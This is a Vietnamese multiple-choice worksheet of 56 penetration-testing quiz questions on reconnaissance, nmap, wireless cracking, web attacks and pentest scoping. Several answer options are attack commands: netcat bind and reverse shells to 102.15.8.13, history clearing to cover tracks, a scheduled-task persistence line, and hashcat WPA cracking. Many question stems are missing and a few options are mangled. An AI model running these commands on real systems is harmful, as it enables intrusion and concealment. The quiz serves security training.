wayground logo

Free Printable Worksheets

NEW

Font size

S
M
L
XL
Worksheets

Kiểm thử

Total questions: 56

Worksheet time: 28mins

Name
Class
Date
1.

Thuật ngữ nào được sử dụng để mô tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin ?

a)

NFC cloning

b)

Bluesnarfing

c)

BlueBorne

d)

Wardriving

2.

Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, CMS Platform, Webserver platform, Server headers, Cookie, Type of Script ... ?

a)

Whatweb

b)

OpenVas

c)

wpscan

d)

w3af

3.
a)

nc 102.15.8.13 4444

b)

nc -e /bin/bash/ -lvp 4444

c)

nc -lvp 4444 102.15.8.13

d)

nc 102.15.8.13 -e/bin/bash

4.

Kỹ thuật kiểm thử nào được thực hiện mà trong đó người kiểm thử không biết bất cứ thông tin nào về hệ thống mục tiêu và mục tiêu cũng không được thông báo trước khi tiến hành kiểm thử ?

a)

Unannouced testing

b)

Blind testing

c)

Double blind testing

d)

Announced testing

5.

a)

Chỉ quét UDP để cải thiện tốc độ

b)

Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

c)

Sử dụng danh sách cổng mặc định

d)


Chuyển sang sử dụng SYN scan

6.
a)

Bẻ khoá PSK được sử dụng để kết nối với điểm truy cập không dây

b)

Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP

c)

Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB

d)

Tiến hành tấn công Brute force PIN WPS để có được quyền truy cập mật khẩu của AP

7.
a)

Trang web có thể tồn tại lỗ hổng XSS

b)

Trang web có thể tồn tại lỗ hỗng SQL injection

c)

Trang web có thể tồn tại lỗ hổng CSRF

d)

Trang web có thể tồn tại lỗ hổng tràn bộ đệm

8.

Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống windows như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này ?

a)

Meterpreter

b)

Powershell

c)

Shellter

d)

Metasploit

9.

Loại văn bản nào sau đây có giá trị pháp lý thường được sử dụng để tham chiếu cho việc bảo vệ tính bí mật của dữ liệu và các thông tin khác mà người kiểm thử có thể gặp phải ?

a)

NDA

b)

SOW

c)

MSA

d)

NIST

10.

Sau khi xâm nhập thành công vào hệ thống mục tiêu và tiến hành cài đặt backdoor, lệnh nào sau đây cho phép người kiểm thử xoá toàn bộ nội dung của phiên làm việc với terminal trên Linux ?

a)

m -f ./history

b)

history -remove

c)

cat history | clear

d)

history -c

11.

Trong quá trình kiểm thử ứng dụng web, Jack phát hiện một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack ?

a)

CSRF, Insecure direct object reference

b)

Code Injection, Directory traversal

c)

Insecure direct object reference, Code Injection

d)

CSRF, Code Injection

12.

Norm đang kiểm thử xâm nhập một ứng dụng web và muốn điều khiển các tham số đầu vào được gửi đến ứng dụng trước khi nó rời khỏi trình duyệt web. Công cụ nào sau đây có thể giúp Norm thực hiện việc này?

a)

GDB

b)

YASCA

c)

Burpsuite

d)

AFL

13.

Trong quá trình thu thập và tìm kiếm thông tin của một kiểm thử xâm nhập vào hệ thống khách hàng, Angela đã khôi phục bức ảnh và muốn kiểm tra, phân tích nó để tìm kiếm các thông tin hữu ích chứa trong metadata. Công cụ nào sau đây thích hợp nhất để thực hiện việc này?

a)

Ngnx

b)

ExitTool

c)

PsTools

d)

Grep

14.

Kiểu tấn công bẻ khoá mật khẩu nào dưới đây chỉ có thể được thực hiện theo hình thức "Tấn công chủ động"?

a)

Dictionary Attack

b)

Hash Injection Attack

c)

Brute force Attack

d)

MiTM

15.

Wendy đang thực hiện tấn công chiếm quyền điều khiển phiên. Wendy cần có được thông tin nào để có thể đảm bảo rằng các cuộc tấn công của cô ấy sẽ thành công ?

a)

Service ticket

b)

Session cookie

c)

Session ticket

d)

Username

16.
a)

XMAS Scan được sử dụng, cổng đóng

b)

NULL Scan được sử dụng, cổng đóng

c)

NULL Scan được sử dụng, cổng mở

d)

IDLE Scan được sử dụng, cổng mở

17.
a)

A

b)

B

c)

C. ... Pend --

d)

D

18.

.......quá trình thu thập thông tin khi tiến hành kiểm thử xâm nhập, trong đó có thể áp dụng các kỹ thuật thu thập chủ động hoặc bị đông.

a)

Footscanning

b)

Footpainting

c)

Footgathering

d)

Footprinting

19.
a)

A

b)

B

c)

C. -useproxy

d)

D

20.

Renee đang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình ?

a)

Không cần thực hiện thêm hành động nào vi phạm vì công việc của Renee chỉ giới hạn trong việc thực hiện kiểm thử.

b)

Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

c)

Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhập

d)

Khắc phục lỗ hổng cho phép Renee có quyền truy cập

21.
a)

Khôi phục mật khẩu WPA từ WPS PIN

b)

Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

c)

Thiết lập proxy để thực hiện tấn công SSL trip lên các yêu cầu HTTPS

d)

Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

22.

Tệp _____ cho phép trình thu thập dữ liệu của công cụ tìm kiếm biết có thể truy cập vào những URL nào trên trang web. Trong đó có thể chứa các thông tin nhạy cảm mà người thực hiện kiểm thử cần quan tâm.

a)

robots.txt

b)

secret.txt

c)

index.txt

d)

sitemap.txt

23.

_____ là hình thức tấn công bằng mật khẩu được xây dựng dựa trên cuộc tấn công từ điển nhưng thêm các thành phần phổ biến hơn như 1 hoặc ! ở cuối mỗi tư. Phương pháp này được sử dụng để tìm những điều bất thường trong mật khẩu

a)

Hybrid attack

b)

Rule based-attack

c)

Non-electronic attack

d)

Brute force attack

24.

Các công cụ HULK, LOIC, HOIC và SlowLoris có khả năng tạo ra tấn công nào dưới đây?

a)

Crack password

b)

SMB hash capture

c)

Dos/DDoS

d)

Brute-force SSH

25.
a)

VHOST

b)

SSL

c)

Proxies

d)

RHOST

26.

Công cụ phổ biển nào được sử dụng để khám phá bị động mạng không dây và cung cấp nhiều tính năng tương tự như airodump-ng?

a)

Aircrack-ng

b)

NetStumbler

c)

Kismet

d)

Netsniff

27.

Mike đang tiến hành kiểm thử xâm nhập cho một ứng dụng web và phát hiện ra quá trình đăng nhập của người dùng đang sử dụng phương thức HTTP GET để gửi dữ liệu. Để giảm thiểu rủi ro lộ thông tin nhạy cảm, giải pháp nào sau đây có thể được sử dụng ?

a)

Sử dụng HTTP TRACE

b)

Sử dụng HTTP POST

c)

Sử dụng HTTP OPTIONS

d)

Sử dụng HTTP PUT

28.
a)

SQL Injection

b)

CSRF

c)

SSL downgrade attack

d)

Sesion hijacking

29.

Khi thực hiện tìm kiếm thông tin sử dụng Google, lệnh nào dưới đây cho phép tìm kiếm các website có cấu trúc thư mục là /admin có phần mở rộng là .edu.vn

a)

site:edu.vn inurl:/admin

b)

info:/admin filetype:edu.vn

c)

index of /admin site:edu.vn

d)

index of /admin link:edu.vn

30.

Kỹ thuật tấn công web nào dưới đây KHÔNG cho phép kẻ tấn công thực hiện đánh cắp phiên làm việc của người dùng hợp lệ ?

a)

CSRF

b)

SQL Injection

c)

XSS

d)

Session hijacking

31.

Trong giai đoạn xác định phạm vi của kiểm thử xâm nhập, Lauren được cung cấp dải IP của hệ thống mà cô ấy sẽ kiểm tra cũng như thông tin về những gì hệ thống chạy nhưng không nhận được một sơ đồ mạng đầy đủ. Kỹ thuật kiểm thử nào được sử dụng trong trường hợp này ?

a)

Crystal box

b)

Gray box

c)

White box

d)

Black box

32.

Lệnh airmon-ng start wlan 0 được sử dụng để thiết lập wireless adapter về chế độ ______.

a)

Crack

b)

Management

c)

Injection

d)

Monitor

33.

Công cụ nào dưới đây KHÔNG có khả năng dò quét lỗ hổng ứng dụng web?

a)

Weblnspect

b)

Wfuzz

c)

Recon-ng

d)

Acunetix

34.

Thông tin nào KHÔNG thể thu thập được thông qua kỹ thuật footprinting ?

a)

Thông tin địa chỉ email

b)

Số điện thoại

c)

Thông tin địa chỉ IP

d)

Sơ đồ kiến trúc mạng nội bộ

35.

Kẻ tấn công lừa người dùng truy cập vào một trang web dộc hại thông qua e-mail liüa dáo. Người dùng nhấp vào liên két email và truy cập trang web độc hại trong khi vẫn duy trì phiên hoạt động được xác thực với ngân hàng của minh. Kẻ tấn công thông qua trang web độc hại đã chỉ thị cho trình duyệt của người dùng gửi yều cầu đến trang web ngân hảng mà người dùng không hề hay biết. Đây là dạng tấn công nào?

a)

CSRF

b)

Hidden form field

c)

XSS

d)

CSPP (Connection String Parameter Pollution)

36.

Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào ?

a)

Enumeration

b)

Active

c)

OSINT

d)

Port scanning

37.
a)

Xác định các mạng hỗ trợ WPS

b)

Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

c)

Bẻ khoá WEP dựa trên gói tin thu được

d)

Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khoá WPS PIN

38.

Jenny thực hiển kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ Windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó ?

a)

net session server | dsquery -user | net use c$

b)

powershell && set-executionpolicy unrestricted

c)

schtask.exe /create/tr powershell.exe Sv.ps1 /run

d)

reg save HKLMSystemCurrentControlSetServiceSv.reg

39.
a)

A

b)

B

c)

C

d)

D (?a?a?a)

40.

____ là cơ sở dữ liệu nào được tạo ra và duy trì bởi MITRE, trong đó nêu chi tiết các kỹ thuật, hành vi kẻ tấn công các cơ quan, tổ chức.

a)

CWE

b)

CAPEC

c)

ATT&CK

d)

CVE

41.

Lệnh nào sau đây cho phép tìm kiếm các web server chạy IIS tại Việt Nam có mở port 22 khi sử dụng Shodan ?

a)

IIS netport:22 country:vn

b)

IIS port:22 geo:vn

c)

IIS os:22 server:vn

d)

IIS port:22 country:vn

42.
a)

Sử dụng SUID/SGID không an toàn

b)

Lạm dụng Sticky bit

c)

Mật khẩu được lưu trữ dưới dạng bản rõ

d)

Quyền truy cập sudo không an toàn

43.
a)

Khởi động reverse shell sử dụng Netcat

b)

Không có đáp án nào đúng

c)

Chặn bắt lưu lượng trên cổng 6666 sử dụng Netcat

d)

Thiết lập bind shell sử dụng Netcat

44.

Loại nào sau đây không phải là khung chính được xác định bởi chuẩn IEEE 802.11 ?

a)

Control frame

b)

Management frame

c)

Beacon frame

d)

Data frame

45.
a)

XSS

b)

SQL injection

c)

Session hijacking

d)

Path traversal

46.
a)

E4:6F:13:04:CE:31

b)

airmon-ng

c)

hashcat -m 2500 WPA.hccapx rockyou.txt

d)

aircrack-ng

47.
a)

Ngày hệ thống được vá lần cuối

b)

Thông tin về các bản vá của Linux kernel đã được cài đặt

c)

Hệ thống đang chạy Linux 2.6 kernel trong khoảng giữa .9 và .33

d)

Xác định thông tin về bản phân phối Linux (Linux distribution) được cài đặt trên hệ thống

48.

Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa là gì ?

a)

Người kiểm thử được cung cấp tài khoản quản trị

b)

Người kiểm thử sẽ chỉ được kết nối tới hệ thống đích trong một khoảng thời gian giới hạn

c)

Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được xác định trước

d)

Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

49.

Trong quá trình kiểm thử, Jack muốn thực hiện dò quét mục tiêu bằng nmap tuy nhiên anh ấy chỉ có quyền ở mức người dùng thông thường. Khi đó, anh ấy nên sử dụng kỹ thuật dò quét nào ?

a)

XMAS scanning

b)

NULL scanning

c)

SYN scanning

d)

TCP Connect scanning

50.

Khi sử dụng nmap để dò quét cổng, tuỳ chọn nào được sử dụng để quét một cổng cụ thể ?

a)

--p

b)

-p

c)

-Pn

d)

-ports

51.

Charleen được giao nhiệm vụ tiếp tục quá trình khai thác lỗ hổng trên hệ thống máy chủ Windows 2012. Các thông tin được chuyển giao bao gồm cả thông tin đăng nhập cấp người dùng trong hệ thống. Mục tiêu của cô ấy là có được quyền quản trị vào hệ thống máy chủ. Charleen đã thu được NTLM hash và muốn thực hiện tấn công pass-the-hash. Công cụ nào có thể được sử dụng trong trường hợp này ?

a)

Hashcat

b)

CeWL

c)

Hydra

d)

Smbcient

52.

Phương pháp bẻ khoá mật khẩu nào sau đây mất nhiều thời gian và công sức nhất, trong đó kẻ tấn công cố gắng mọi kết hợp có thể có của chữ hoa, chữ thường, chữ cái, số và ký tự đặc biệt ?

a)

Rule based-attack

b)

Brute force attack

c)

Dictionary attack

d)

Hybrid attack

53.

Tom thực hiện quá trình quét cổng một hệ thống và kết quả quét cho thấy 6 cổng TCP đang mở là 22, 80, 443, 515, 631 và 9100. Thiết bị nào sau đây có khả năng nhất ?

a)

FTP server

b)

SSH server

c)

Webserver

d)

Printer

54.

Sau khi thực hiện xâm nhập hệ thống mục tiêu bằng một tài khoản không có đặc quyền, Steve phát hiện ra rằng trên hệ thống mục tiêu có cài đặt nmap. Steve quyết định sử dụng nmap để dò quét các máy chủ khác trong mạng nội bộ. Tuỳ chọn nào cần được sử dụng để dò quét thành công các máy chủ khác khi sử dụng nmap bằng tài khoản không có đặc quyền mà Steve chiếm được

a)

-oA

b)

-sT

c)

-sV

d)

-u

55.

Trong các đáp án dưới đây thì đâu là 1 kiểu tấn công từ chối dịch vụ trong mạng không dây ?

a)

Packet Injection

b)

Evil twin

c)

Jamming attack

d)

Karma attack

56.
a)

Writeable service

b)

Application whitelisting

c)

Shell escape

d)

Insecure file permissions